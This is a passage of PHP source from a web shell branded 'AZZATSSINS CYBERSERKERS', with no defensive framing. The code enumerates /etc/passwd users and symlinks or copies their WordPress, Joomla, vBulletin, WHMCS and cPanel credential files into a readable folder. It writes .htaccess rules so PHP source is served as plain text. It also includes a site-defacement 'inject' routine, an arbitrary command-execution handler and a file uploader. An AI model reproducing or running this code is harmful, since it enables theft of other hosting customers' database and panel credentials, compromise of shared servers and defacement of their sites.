1294. file_put_contents(".htaccess",$byht);
1295.  
1296. echo "<script>alert('Safe Mode ByPassed'); hideAll();</script>";
1297.  
1298. die();
1299.  
1300. }
1301.  
1302. elseif($_POST['ac'] == "chkph"){
1303.  
1304. if(is_readable("/etc/passwd")){
1305.  
1306. if(!is_dir("xyz")){
1307.  
1308. @mkdir('xyz',0777);
1309.  
1310. }
1311.  
1312. $htaccss = "Options all
1313.  
1314. DirectoryIndex AZZATSSINS.html
1315.  
1316. AddType text/plain .php
1317.  
1318. AddHandler server-parsed .php
1319.  
1320.  AddType text/plain .html
1321.  
1322. AddHandler txt .html
1323.  
1324. Require None
1325.  
1326. Satisfy Any";
1327.  
1328. file_put_contents("xyz/.htaccess",$htaccss);
1329.  
1330. $etc = file_get_contents("/etc/passwd");
1331.  
1332. $etcz = explode("\n",$etc);
1333.  
1334. foreach($etcz as $etz){
1335.  
1336. $etcc = explode(":",$etz);
1337.  
1338. error_reporting(0);
1339.  
1340. if($enable_wp){
1341.  
1342. symlink('/home/'.$etcc[0].'/public_html/wp-config.php',"xyz/".$etcc[0].'-WordPress.txt');
1343.  
1344. symlink('/home/'.$etcc[0].'/public_html/blog/wp-config.php',"xyz/".$etcc[0].'-WordPress.txt');
1345.  
1346. symlink('/home/'.$etcc[0].'/public_html/wp/wp-config.php',"xyz/".$etcc[0].'-WordPress.txt');
1347.  
1348. }
1349.  
1350. if($enable_phpbb){
1351.  
1352. symlink('/home/'.$etcc[0].'/public_html/config.php',"xyz/".$etcc[0].'-PhpBB.txt');
1353.  
1354. }
1355.  
1356. if($enable_vb){
1357.  
1358. symlink('/home/'.$etcc[0].'/public_html/includes/config.php',"xyz/".$etcc[0].'-vBulletin.txt');
1359.  
1360. }
1361.  
1362. if($enable_joomla){
1363.  
1364. symlink('/home/'.$etcc[0].'/public_html/configuration.php',"xyz/".$etcc[0].'-Joomla.txt');
1365.  
1366. symlink('/home/'.$etcc[0].'/public_html/web/configuration.php',"xyz/".$etcc[0].'-Joomla.txt');
1367.  
1368. symlink('/home/'.$etcc[0].'/public_html/site/configuration.php',"xyz/".$etcc[0].'-Joomla.txt');
1369.  
1370. }
1371.  
1372. }
1373.  
1374. $lol = explode("/",curPageURL());
1375.  
1376. $link = str_replace(end($lol),"",curPageURL());
1377.  
1378. $str = file_get_contents($link."/xyz");
1379.  
1380. preg_match_all('%\w \w{4}=(\"|\')(.*)\.txt(\"|\')%',$str,$exp);
1381.  
1382. if(is_array($exp[2])){
1383.  
1384. $q = 2;
1385.  
1386. $dmn = getDnamed();
1387.  
1388. foreach($exp[2] as $sitez){
1389.  
1390. if($q == 2){$q = 1;}else{$q = 2;}
1391.  
1392. $j += 1;
1393.  
1394. $sn = explode("-",$sitez);
1395.  
1396. $domain = $dmn[$sn[0]];
1397.  
1398. if($domain){
1399.  
1400. $domain = "<a id='inj_dom".$j."' href='http://".$domain."'>".$domain."</a>";
1401.  
1402. }else{
1403.  
1404. $domain = "<a id='inj_dom".$j."' href=''>...</a>";
1405.  
1406. }
1407.  
1408. $nan .= '<div id="inj'.$j.'">
1409.  
1410. <div class="tblbx'.$q.'" style="width:200px;cursor:pointer;background-color:#76BBEB;" id="injc'.$j.'"onClick="doToggle(\''.$j.'\');">'.$sn[0].'<input style="display:none;" type="checkbox" id="injchk'.$j.'" checked></div>
1411.  
1412. <div class="tblbx'.$q.'" style="width:220px;" id="inj_domain'.$j.'">'.$domain.'</div>
1413.  
1414. <div class="tblbx'.$q.'" style="width:160px;"><a id="injst'.$j.'" class="conf" href="'.$link.'xyz/'.$sitez.'.txt" title="'.$j.'">'.ucfirst($sn[1]).'</a></div>
1415.  
1416. <div class="tblbx'.$q.'" style="width:120px;" id="inj_status'.$j.'" title="On Process...">Process...</div>
1417.  
1418. </div>';
1419.  
1420. }
1421.  
1422. $cnt = '<input type="text" style="display:none" id="sitecount" value="'.$j.'">';
1423.  
1424. echo $nan.$cnt;
1425.  
1426. }
1427.  
1428. }
1429.  
1430. die();
1431.  
1432. }
1433.  
1434. elseif($_POST['ac'] == "chkph2"){
1435.  
1436. if(is_readable("/etc/passwd")){
1437.  
1438. if(!is_dir("xyz")){
1439.  
1440. @mkdir('xyz',0777);
1441.  
1442. }
1443.  
1444. if(!is_link("xyz/root")){
1445.  
1446. $sym = symlink("/","xyz/root");
1447.  
1448. if(!$sym){
1449.  
1450. die("Symlink method failed.");
1451.  
1452. }
1453.  
1454. }
1455.  
1456. $htaccss = "Options all
1457.  
1458. DirectoryIndex AZZATSSINS.html
1459.  
1460. AddType text/plain .php
1461.  
1462. AddHandler server-parsed .php
1463.  
1464.  AddType text/plain .html
1465.  
1466. AddHandler txt .html
1467.  
1468. Require None
1469.  
1470. Satisfy Any";
1471.  
1472. file_put_contents("xyz/.htaccess",$htaccss);
1473.  
1474. $etc = file_get_contents("/etc/passwd");
1475.  
1476. $etcz = explode("\n",$etc);
1477.  
1478. $lol = explode("/",curPageURL());
1479.  
1480. $link = str_replace(end($lol),"",curPageURL());
1481.  
1482. @unlink("rootinject.tmp");
1483.  
1484. $q = 2;
1485.  
1486. $dmn = getDnamed();
1487.  
1488. foreach($etcz as $etz){
1489.  
1490. $etcc = explode(":",$etz);
1491.  
1492. $dr = "xyz/root/home/".$etcc[0]."/public_html/";
1493.  
1494. $dan = chkSys($link.$dr);
1495.  
1496. if($dan){
1497.  
1498. if($q == 2){$q = 1;}else{$q = 2;}
1499.  
1500. $domain = $dmn[$etcc[0]];
1501.  
1502. if($domain){
1503.  
1504. $domain = "<a id='inj_dom".$k."' href='http://".$domain."'>".$domain."</a>";
1505.  
1506. }else{
1507.  
1508. $domain = "<a id='inj_dom".$k."' href=''>...</a>";
1509.  
1510. }
1511.  
1512. $k += 1;
1513.  
1514. $nant = '<div id="inj'.$k.'">
1515.  
1516. <div class="tblbx'.$q.'" style="width:200px;cursor:pointer;background-color:#76BBEB;" id="injc'.$k.'"onClick="doToggle(\''.$k.'\');">'.$etcc[0].'<input style="display:none;" type="checkbox" id="injchk'.$k.'" checked></div>
1517.  
1518. <div class="tblbx'.$q.'" style="width:220px;" id="inj_domain'.$k.'">'.$domain.'</div>
1519.  
1520. <div class="tblbx'.$q.'" style="width:160px;"><a class="conf" href="'.$dan['link'].'">'.$dan['cms'].'</a></div>
1521.  
1522. <div class="tblbx'.$q.'" style="width:120px;" id="inj_status'.$k.'">Process...</div>
1523.  
1524. </div>';
1525.  
1526. file_put_contents("rootinject.tmp",$nant,FILE_APPEND);
1527.  
1528. $nan .= $nant;
1529.  
1530. }
1531.  
1532. }
1533.  
1534. $cnt = '<input type="text" style="display:none" id="sitecount" value="'.$k.'">';
1535.  
1536. echo $nan.$cnt;
1537.  
1538. }
1539.  
1540. die();
1541.  
1542. }
1543.  
1544. elseif($_POST['ac'] == "inject"){
1545.  
1546. error_reporting(0);
1547.  
1548. $cms = strtolower($_POST['cms']);
1549.  
1550. $cnf = $_POST['conf'];
1551.  
1552. if(file_exists(md5($_POST['deface_page']))){
1553.  
1554. $html = file_get_contents(md5($_POST['deface_page']));
1555.  
1556. }else{
1557.  
1558. $html = file_get_contents($_POST['deface_page']);
1559.  
1560. file_put_contents(md5($_POST['deface_page']),$html);
1561.  
1562. file_put_contents("azzatssins.html",$html);
1563.  
1564. }
1565.  
1566. if(!is_dir("cookie")){
1567.  
1568. @mkdir("cookie",0777);
1569.  
1570. }
1571.  
1572. switch($cms){
1573.  
1574. case "wordpress":
1575.  
1576. doXploitWP($cnf,$html,"azzatssins");
1577.  
1578. break;
1579.  
1580. case "joomla":
1581.  
1582. doXploitJM($cnf,$html,"azzatssins");
1583.  
1584. break;
1585.  
1586. case "vbulletin":
1587.  
1588. doXploitVB($cnf,$html);
1589.  
1590. break;
1591.  
1592. case "phpbb":
1593.  
1594. break;
1595.  
1596. case "ipb":
1597.  
1598. break;
1599.  
1600. case "mybb":
1601.  
1602. break;
1603.  
1604. case "oscommerce":
1605.  
1606. break;
1607.  
1608. case "smf":
1609.  
1610. break;
1611.  
1612. case "drupal":
1613.  
1614. break;
1615.  
1616. case "seditio":
1617.  
1618. break;
1619.  
1620. case "e107":
1621.  
1622. break;
1623.  
1624. }
1625.  
1626. throwErr("Not Added");
1627.  
1628. }
1629.  
1630. elseif($_POST['ac'] == "ssh"){
1631.  
1632. $ssh = exme($_POST['command']);
1633.  
1634. die(nl2br($ssh));
1635.  
1636. }
1637.  
1638. elseif($_POST['ac'] == "phpinfo"){
1639.  
1640. $php = phpinfo();
1641.  
1642. die($php);
1643.  
1644. }
1645.  
1646. ;echo '<html>
1647.  
1648. <meta content="Simple WebShell AZZATSSINS CYBERSERKERS" name="description"/>
1649. <meta content="AZZATSSINS SHELL 2016, BCA SHELL RECODED BY AZZATSSINS, LINUX WEBSHELL, CYBERSERKERS WRBSHELL, SIMPLE WEBSHELL, AZZATSSINS CYBERSERKERS, SHIKI ASURA, P1N0CH10, CAZZTER, AZZTCHER, COOL WEBSHELL, HACKED BY AZZATSSINS, AZZATSSINS WAS HERE" name="keywords"/>
1650. <title>.: !- GO A HEAD AND TRY TO STOP ME -! :.</title>
1651.  
1652. <head>
1653.  
1654. <script src="http://code.jquery.com/jquery-latest.min.js"></script>
1655.  
1656. </head>
1657.  
1658. <body bgcolor="black" background="http://azzat.wap.mu/files/1049320/AZZATSSINS.png">
1659.  
1660. <style>
1661.  
1662. body{
1663.  
1664. font-family: "courier new";
1665.  
1666. background-color: black;
1667.  
1668. font-size:80%;
1669.  
1670. color: #28FE14;
1671.  
1672. background-image: url("http://i.imgur.com/zHNCk2e.gif");
1673.  
1674. }
1675.  
1676. #sysinfo{
1677.  
1678. border: 1px solid #28FE14;
1679.  
1680. position:fixed;
1681.  
1682. padding:2px;
1683.  
1684. top:1px;
1685.  
1686. left:1px;
1687.  
1688. background-color: black;
1689.  
1690. font-size:12px;
1691.  
1692. }
1693.  
1694. #phpinfo{
1695.  
1696. border: 1px solid #28FE14;
1697.  
1698. position:fixed;
1699.  
1700. padding:2px;
1701.  
1702. top:1px;
1703.  
1704. right:1px;
1705.  
1706. background-color: black;
1707.  
1708. font-size:12px;
1709.  
1710. }
1711.  
1712. #status{
1713.  
1714. border: 1px solid #28FE14;
1715.  
1716. position:fixed;
1717.  
1718. padding:2px;
1719.  
1720. bottom:1px;
1721.  
1722. right:1px;
1723.  
1724. background-color: black;
1725.  
1726. font-size:12px;
1727.  
1728. }
1729.  
1730. #infobox{
1731.  
1732. z-index:1;
1733.  
1734. border: 1px solid white;
1735.  
1736. margin-left:auto;
1737.  
1738. margin-right:auto;
1739.  
1740. margin-top:50px;
1741.  
1742. width:600px;
1743.  
1744. background-color: black;
1745.  
1746. font-size:12px;
1747.  
1748. }
1749.  
1750. .infotitle{
1751.  
1752. padding:4px;
1753.  
1754. background-color: white;
1755.  
1756. color: black;
1757.  
1758. font-family: Thaoma;
1759.  
1760. font-size:14px;
1761.  
1762. }
1763.  
1764. .infotxt{
1765.  
1766. padding:5px;
1767.  
1768. }
1769.  
1770.  
1771.  
1772. .sidebar{
1773.  
1774. position:fixed;
1775.  
1776. left:1px;
1777.  
1778. top:30%;
1779.  
1780. }
1781.  
1782. .stitle{
1783.  
1784. float:left;
1785.  
1786. cursor:pointer;
1787.  
1788. padding:7px;
1789.  
1790. color:black;
1791.  
1792. background-color: white;
1793.  
1794. }
1795.  
1796. .stitle:hover{
1797.  
1798. color:red;
1799.  
1800. }
1801.  
1802. .smnu{
1803.  
1804. display:none;
1805.  
1806. background-color: black;
1807.  
1808. padding:5px;
1809.  
1810. border: 1px solid white;
1811.  
1812. float:left;
1813.  
1814. }
1815.  
1816. a{
1817.  
1818. color: #df5;
1819.  
1820. text-decoration: none;
1821.  
1822. }
1823.  
1824. a:hover{
1825.  
1826. color:white;
1827.  
1828. }
1829.  
1830. .copyright{
1831.  
1832. position:fixed;
1833.  
1834. bottom:1px;
1835.  
1836. left:1px;
1837.  
1838. padding:2px;
1839.  
1840. }
1841.  
1842. .logo{
1843.  
1844. margin:auto;
1845.  
1846. width:600px;
1847.  
1848. height:600px;
1849.  
1850. background-image: url("");
1851.  
1852. }
1853.  
1854. .filetable{
1855.  
1856. margin-top:2px;
1857.  
1858. width:740px;
1859.  
1860. }
1861.  
1862. .tblcnt{
1863.  
1864. text-align: center;
1865.  
1866. margin-left:2px;
1867.  
1868. color:black;
1869.  
1870. background-color: white;
1871.  
1872. padding:3px;
1873.  
1874. float:left;
1875.  
1876. border: 1px solid white;
1877.  
1878. }
1879.  
1880. .tblbx1{
1881.  
1882. height:12px;
1883.  
1884. text-align: center;
1885.  
1886. margin-left:2px;
1887.  
1888. color:white;
1889.  
1890. background-color: #333333;
1891.  
1892. padding:3px;
1893.  
1894. float:left;
1895.  
1896. border: 1px solid #333333;
1897.  
1898. }
1899.  
1900. .tblbx2{
1901.  
1902. height:12px;
1903.  
1904. text-align: center;
1905.  
1906. margin-left:2px;
1907.  
1908. color:white;
1909.  
1910. background-color: #444444;
1911.  
1912. padding:3px;
1913.  
1914. float:left;
1915.  
1916. border: 1px solid #444444;
1917.  
1918. }
1919.  
1920.  
1921.  
1922. .tbl{
1923.  
1924. margin-top:100px;
1925.  
1926. padding-top:2px;
1927.  
1928. padding-bottom: 2px;
1929.  
1930. margin:auto;
1931.  
1932. width:742px;
1933.  
1934. border: 1px solid white;
1935.  
1936. }
1937.  
1938. .rbox{
1939.  
1940. float:left;
1941.  
1942. border: 1px solid #28FE14;
1943.  
1944. padding:10px;
1945.  
1946. }
1947.  
1948. .smit{
1949.  
1950. background-color: black;
1951.  
1952. color: #28FE14;
1953.  
1954. }
1955.  
1956. .sshbox{
1957.  
1958. display:none;
1959.  
1960. padding-left:7px;
1961.  
1962. width:600px;
1963.  
1964. height:400px;
1965.  
1966. margin: auto;
1967.  
1968. margin-top:80px;
1969.  
1970. -webkit-border-radius: 10px;
1971.  
1972. -moz-border-radius: 10px;
1973.  
1974. border-radius: 10px;
1975.  
1976. border:3px solid #FFF5F5;
1977.  
1978. background-color:#080500;
1979.  
1980. overflow:auto;
1981.  
1982. }
1983.  
1984. #sshcmd{
1985.  
1986. width:450px;
1987.  
1988. background-color: #080500;
1989.  
1990. color:#28FE14;
1991.  
1992. border:none;
1993.  
1994. }
1995.  
1996.  
1997.  
1998. </style>
1999.  
2000. <body>
2001.  
2002. <div class="logo" id="logo"></div>
2003.  
2004. <div id="sysinfo"><strong>OS:</strong> ';echo php_uname("s")." - ".php_uname("r")." /  ".php_uname("m");;echo '</div>
2005.  
2006.  
2007.  
2008. <div id="phpinfo"> ';
2009.  
2010. $srvsoft = explode(" ",$_SERVER['SERVER_SOFTWARE']);
2011.  
2012. echo $srvsoft[0];
2013.  
2014. echo " PHP ".phpversion();
2015.  
2016. if( ini_get('safe_mode') ){
2017.  
2018. echo " <font color='red'>Safe Mode On</font>";
2019.  
2020. }else{
2021.  
2022. echo " <font color='blue'>Safe Mode Off</font>";
2023.  
2024. }
2025.  
2026. ;echo '</div>
2027. ';
2028.  
2029. if($_GET['file']=="uploader"){ echo '<center><br><br><br><form method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
2030.  echo '<input name="uploadto" type="text" size="30" value="'.getcwd().'"><br />';
2031.  echo '<input type="file" name="file" size="30"><input name="_upl" type="submit" id="_upl" value="Upload"></form></center>';
2032.  if( $_POST['_upl'] == "Upload" ) {
2033.  if(@copy($_FILES['file']['tmp_name'], $_POST['uploadto'].'/'.$_FILES['file']['name'])) {
2034.  echo '<center><b><a href="'.$_FILES['file']['name'].'">Upload success!</a></b></center><br>'.$_POST['uploadto']."/".$_FILES['file']['name'];
2035. } else {
2036. echo '<center><b><a href=http://fb.me/AZZATSSINS.CYBERSERKERS>Upload failed!</a></b></center>'; }
2037. }}
2038.  
2039. if($_GET['config']=="grabber"){
2040.  ?>
2041. <title>ConfiGrabber V3.2 by AZZATSSINS</title><body bgcolor=silver><center><div style=background:black;margin:0px;padding:4px;text-align:center;color:silver;><i><b><font color=lime>&copy; </font><a href=mailto:cyberserkers@gmail.com>AZZATSSINS CYBERSERKERS</a></b></i></div><br><br><br><form method="post"><input type="hidden" cols="100" rows="100" name="passwd" value="<?php $usr=file("/etc/passwd"); foreach($usr as $usrr) { $str=explode(":",$usrr); echo $str[0]."\n"; } ?>
2042. "><br>Your Folder  : <input type="text" class="input" name="folfig" size="10" value="CONFIGRAB">
2043. <input style="background:dodgerblue;margin:0px;width:15%;padding:0px;color:#fff;border:0;font-weight:bold;" name="conf" class="ipt" value="EXECUTE" type="submit"><br><br></form></center>
2044. <?php @ini_set('html_errors',0); @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
2045. if ($_POST['conf']) {
2046. $folfig = $_POST['folfig'];
2047. $functions=@ini_get("disable_functions"); if(eregi("symlink",$functions)){die ('<font color=red>Symlnk Has Been Disable...!!!</font>');}
2048. @mkdir($folfig, 0755);
2049. @chdir($folfig);
2050. $htaccess="Options Indexes FollowSymLinks\nDirectoryIndex azzatssins.cyberserkers\nAddType txt .php\nAddHandler txt .php";
2051. file_put_contents(".htaccess",$htaccess,FILE_APPEND);
2052. $passwd=explode("\n",$_POST["passwd"]);
2053. foreach($passwd as $pwd){ $user=trim($pwd);
2054. symlink('/','000~ROOT~000');
2055. copy('/home/'.$user.'/.my.cnf',$user.' <~ CPANEL');
2056. symlink('/home/'.$user.'/.my.cnf',$user.' <~ CPANEL');
2057. copy('/home/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
2058. symlink('/home/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
2059. copy('/home/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER.txt');
2060. symlink('/home/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER.txt');
2061. symlink('/home/'.$user.'/public_html/.accesshash',$user.' <~ RESELLER.txt');
2062. copy('/home/'.$user.'/public_html/wp-config.php',$user.' <~ WORDPRESS.txt');
2063. copy('/home/'.$user.'/public_html/configuration.php',$user.' <~ WHMCS or JOOMLA.txt');
2064. copy('/home/'.$user.'/public_html/account/configuration.php',$user.' <~ WHMCS.txt');
2065. copy('/home/'.$user.'/public_html/accounts/configuration.php',$user.' <~ WHMCS.txt');
2066. copy('/home/'.$user.'/public_html/buy/configuration.php',$user.' <~ WHMCS.txt');
2067. copy('/home/'.$user.'/public_html/checkout/configuration.php',$user.' <~ WHMCS.txt');
2068. copy('/home/'.$user.'/public_html/central/configuration.php',$user.' <~ WHMCS.txt');
2069. copy('/home/'.$user.'/public_html/clienti/configuration.php',$user.' <~ WHMCS.txt');
2070. copy('/home/'.$user.'/public_html/client/configuration.php',$user.' <~ WHMCS.txt');
2071. copy('/home/'.$user.'/public_html/cliente/configuration.php',$user.' <~ WHMCS.txt');
2072. copy('/home/'.$user.'/public_html/clientes/configuration.php',$user.' <~ WHMCS.txt');
2073. copy('/home/'.$user.'/public_html/clients/configuration.php',$user.' <~ WHMCS.txt');
2074. copy('/home/'.$user.'/public_html/clientarea/configuration.php',$user.' <~ WHMCS.txt');
2075. copy('/home/'.$user.'/public_html/clientsarea/configuration.php',$user.' <~ WHMCS.txt');
2076. copy('/home/'.$user.'/public_html/client-area/configuration.php',$user.' <~ WHMCS.txt');
2077. copy('/home/'.$user.'/public_html/clients-area/configuration.php',$user.' <~ WHMCS.txt');
2078. copy('/home/'.$user.'/public_html/clientzone/configuration.php',$user.' <~ WHMCS.txt');
2079. copy('/home/'.$user.'/public_html/client-zone/configuration.php',$user.' <~ WHMCS.txt');
2080. copy('/home/'.$user.'/public_html/core/configuration.php',$user.' <~ WHMCS.txt');
2081. copy('/home/'.$user.'/public_html/company/configuration.php',$user.' <~ WHMCS.txt');
2082. copy('/home/'.$user.'/public_html/customer/configuration.php',$user.' <~ WHMCS.txt');
2083. copy('/home/'.$user.'/public_html/customers/configuration.php',$user.' <~ WHMCS.txt');
2084. copy('/home/'.$user.'/public_html/bill/configuration.php',$user.' <~ WHMCS.txt');
2085. copy('/home/'.$user.'/public_html/billing/configuration.php',$user.' <~ WHMCS.txt');
2086. copy('/home/'.$user.'/public_html/finance/configuration.php',$user.' <~ WHMCS.txt');
2087. copy('/home/'.$user.'/public_html/financeiro/configuration.php',$user.' <~ WHMCS.txt');
2088. copy('/home/'.$user.'/public_html/host/configuration.php',$user.' <~ WHMCS.txt');
2089. copy('/home/'.$user.'/public_html/hosts/configuration.php',$user.' <~ WHMCS.txt');
2090. copy('/home/'.$user.'/public_html/hosting/configuration.php',$user.' <~ WHMCS.txt');
2091. copy('/home/'.$user.'/public_html/hostings/configuration.php',$user.' <~ WHMCS.txt');
2092. copy('/home/'.$user.'/public_html/klien/configuration.php',$user.' <~ WHMCS.txt');
2093. copy('/home/'.$user.'/public_html/manage/configuration.php',$user.' <~ WHMCS.txt');
2094. copy('/home/'.$user.'/public_html/manager/configuration.php',$user.' <~ WHMCS.txt');
2095. copy('/home/'.$user.'/public_html/member/configuration.php',$user.' <~ WHMCS.txt');
2096. copy('/home/'.$user.'/public_html/members/configuration.php',$user.' <~ WHMCS.txt');
2097. copy('/home/'.$user.'/public_html/my/configuration.php',$user.' <~ WHMCS.txt');
2098. copy('/home/'.$user.'/public_html/myaccount/configuration.php',$user.' <~ WHMCS.txt');
2099. copy('/home/'.$user.'/public_html/my-account/client/configuration.php',$user.' <~ WHMCS.txt');
2100. copy('/home/'.$user.'/public_html/myaccounts/configuration.php',$user.' <~ WHMCS.txt');
2101. copy('/home/'.$user.'/public_html/my-accounts/configuration.php',$user.' <~ WHMCS.txt');
2102. copy('/home/'.$user.'/public_html/order/configuration.php',$user.' <~ WHMCS.txt');
2103. copy('/home/'.$user.'/public_html/orders/configuration.php',$user.' <~ WHMCS.txt');
2104. copy('/home/'.$user.'/public_html/painel/configuration.php',$user.' <~ WHMCS.txt');
2105. copy('/home/'.$user.'/public_html/panel/configuration.php',$user.' <~ WHMCS.txt');
2106. copy('/home/'.$user.'/public_html/panels/configuration.php',$user.' <~ WHMCS.txt');
2107. copy('/home/'.$user.'/public_html/portal/configuration.php',$user.' <~ WHMCS.txt');
2108. copy('/home/'.$user.'/public_html/portals/configuration.php',$user.' <~ WHMCS.txt');
2109. copy('/home/'.$user.'/public_html/purchase/configuration.php',$user.' <~ WHMCS.txt');
2110.  
2111. copy('/home/'.$user.'/public_html/secure/configuration.php',$user.' <~ WHMCS.txt');
2112. copy('/home/'.$user.'/public_html/support/configuration.php',$user.' <~ WHMCS.txt');
2113. copy('/home/'.$user.'/public_html/supporte/configuration.php',$user.' <~ WHMCS.txt');
2114. copy('/home/'.$user.'/public_html/supports/configuration.php',$user.' <~ WHMCS.txt');
2115. copy('/home/'.$user.'/public_html/web/configuration.php',$user.' <~ WHMCS.txt');
2116. copy('/home/'.$user.'/public_html/webhost/configuration.php',$user.' <~ WHMCS.txt');
2117. copy('/home/'.$user.'/public_html/webhosting/configuration.php',$user.' <~ WHMCS.txt');
2118. copy('/home/'.$user.'/public_html/whm/configuration.php',$user.' <~ WHMCS.txt');
2119. copy('/home/'.$user.'/public_html/whmcs/configuration.php',$user.' <~ WHMCS.txt');
2120. copy('/home/'.$user.'/public_html/whmcs2/configuration.php',$user.' <~ WHMCS.txt');
2121. copy('/home/'.$user.'/public_html/Whm/configuration.php',$user.' <~ WHMCS.txt');
2122. copy('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.' <~ WHMCS.txt');
2123. copy('/home/'.$user.'/public_html/WHM/configuration.php',$user.' <~ WHMCS.txt');
2124. copy('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.' <~ WHMCS.txt');
2125. symlink('/home/'.$user.'/public_html/wp-config.php',$user.' <~ WORDPRESS.txt');
2126. symlink('/home/'.$user.'/public_html/configuration.php',$user.' <~ WHMCS or JOOMLA.txt');
2127. symlink('/home/'.$user.'/public_html/account/configuration.php',$user.' <~ WHMCS.txt');
2128. symlink('/home/'.$user.'/public_html/accounts/configuration.php',$user.' <~ WHMCS.txt');
2129. symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.' <~ WHMCS.txt');
2130. symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.' <~ WHMCS.txt');
2131. symlink('/home/'.$user.'/public_html/central/configuration.php',$user.' <~ WHMCS.txt');
2132. symlink('/home/'.$user.'/public_html/clienti/configuration.php',$user.' <~ WHMCS.txt');
2133. symlink('/home/'.$user.'/public_html/client/configuration.php',$user.' <~ WHMCS.txt');
2134. symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.' <~ WHMCS.txt');
2135. symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.' <~ WHMCS.txt');
2136. symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.' <~ WHMCS.txt');
2137. symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.' <~ WHMCS.txt');
2138. symlink('/home/'.$user.'/public_html/clientsarea/configuration.php',$user.' <~ WHMCS.txt');
2139. symlink('/home/'.$user.'/public_html/client-area/configuration.php',$user.' <~ WHMCS.txt');
2140. symlink('/home/'.$user.'/public_html/clients-area/configuration.php',$user.' <~ WHMCS.txt');
2141. symlink('/home/'.$user.'/public_html/clientzone/configuration.php',$user.' <~ WHMCS.txt');
2142. symlink('/home/'.$user.'/public_html/client-zone/configuration.php',$user.' <~ WHMCS.txt');
2143. symlink('/home/'.$user.'/public_html/core/configuration.php',$user.' <~ WHMCS.txt');
2144. symlink('/home/'.$user.'/public_html/company/configuration.php',$user.' <~ WHMCS.txt');
2145. symlink('/home/'.$user.'/public_html/customer/configuration.php',$user.' <~ WHMCS.txt');
2146. symlink('/home/'.$user.'/public_html/customers/configuration.php',$user.' <~ WHMCS.txt');
2147. symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.' <~ WHMCS.txt');
2148. symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.' <~ WHMCS.txt');
2149. symlink('/home/'.$user.'/public_html/finance/configuration.php',$user.' <~ WHMCS.txt');
2150. symlink('/home/'.$user.'/public_html/financeiro/configuration.php',$user.' <~ WHMCS.txt');
2151. symlink('/home/'.$user.'/public_html/host/configuration.php',$user.' <~ WHMCS.txt');
2152. symlink('/home/'.$user.'/public_html/hosts/configuration.php',$user.' <~ WHMCS.txt');
2153. symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.' <~ WHMCS.txt');
2154. symlink('/home/'.$user.'/public_html/hostings/configuration.php',$user.' <~ WHMCS.txt');
2155. symlink('/home/'.$user.'/public_html/klien/configuration.php',$user.' <~ WHMCS.txt');
2156. symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.' <~ WHMCS.txt');
2157. symlink('/home/'.$user.'/public_html/manager/configuration.php',$user.' <~ WHMCS.txt');
2158. symlink('/home/'.$user.'/public_html/member/configuration.php',$user.' <~ WHMCS.txt');
2159. symlink('/home/'.$user.'/public_html/members/configuration.php',$user.' <~ WHMCS.txt');
2160. symlink('/home/'.$user.'/public_html/my/configuration.php',$user.' <~ WHMCS.txt');
2161. symlink('/home/'.$user.'/public_html/myaccount/configuration.php',$user.' <~ WHMCS.txt');
2162. symlink('/home/'.$user.'/public_html/my-account/client/configuration.php',$user.' <~ WHMCS.txt');
2163. symlink('/home/'.$user.'/public_html/myaccounts/configuration.php',$user.' <~ WHMCS.txt');
2164. symlink('/home/'.$user.'/public_html/my-accounts/configuration.php',$user.' <~ WHMCS.txt');
2165. symlink('/home/'.$user.'/public_html/order/configuration.php',$user.' <~ WHMCS.txt');
2166. symlink('/home/'.$user.'/public_html/orders/configuration.php',$user.' <~ WHMCS.txt');
2167. symlink('/home/'.$user.'/public_html/painel/configuration.php',$user.' <~ WHMCS.txt');
2168. symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.' <~ WHMCS.txt');
2169. symlink('/home/'.$user.'/public_html/panels/configuration.php',$user.' <~ WHMCS.txt');
2170. symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.' <~ WHMCS.txt');
2171. symlink('/home/'.$user.'/public_html/portals/configuration.php',$user.' <~ WHMCS.txt');
2172. symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.' <~ WHMCS.txt');
2173.  
2174. symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.' <~ WHMCS.txt');
2175. symlink('/home/'.$user.'/public_html/support/configuration.php',$user.' <~ WHMCS.txt');
2176. symlink('/home/'.$user.'/public_html/supporte/configuration.php',$user.' <~ WHMCS.txt');
2177. symlink('/home/'.$user.'/public_html/supports/configuration.php',$user.' <~ WHMCS.txt');
2178. symlink('/home/'.$user.'/public_html/web/configuration.php',$user.' <~ WHMCS.txt');
2179. symlink('/home/'.$user.'/public_html/webhost/configuration.php',$user.' <~ WHMCS.txt');
2180. symlink('/home/'.$user.'/public_html/webhosting/configuration.php',$user.' <~ WHMCS.txt');
2181. symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.' <~ WHMCS.txt');
2182. symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.' <~ WHMCS.txt');
2183. symlink('/home/'.$user.'/public_html/whmcs2/configuration.php',$user.' <~ WHMCS.txt');
2184. symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.' <~ WHMCS.txt');
2185. symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.' <~ WHMCS.txt');
2186. symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.' <~ WHMCS.txt');
2187. symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.' <~ WHMCS.txt');
2188. copy('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
2189. copy('/home/'.$user.'/public_html/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
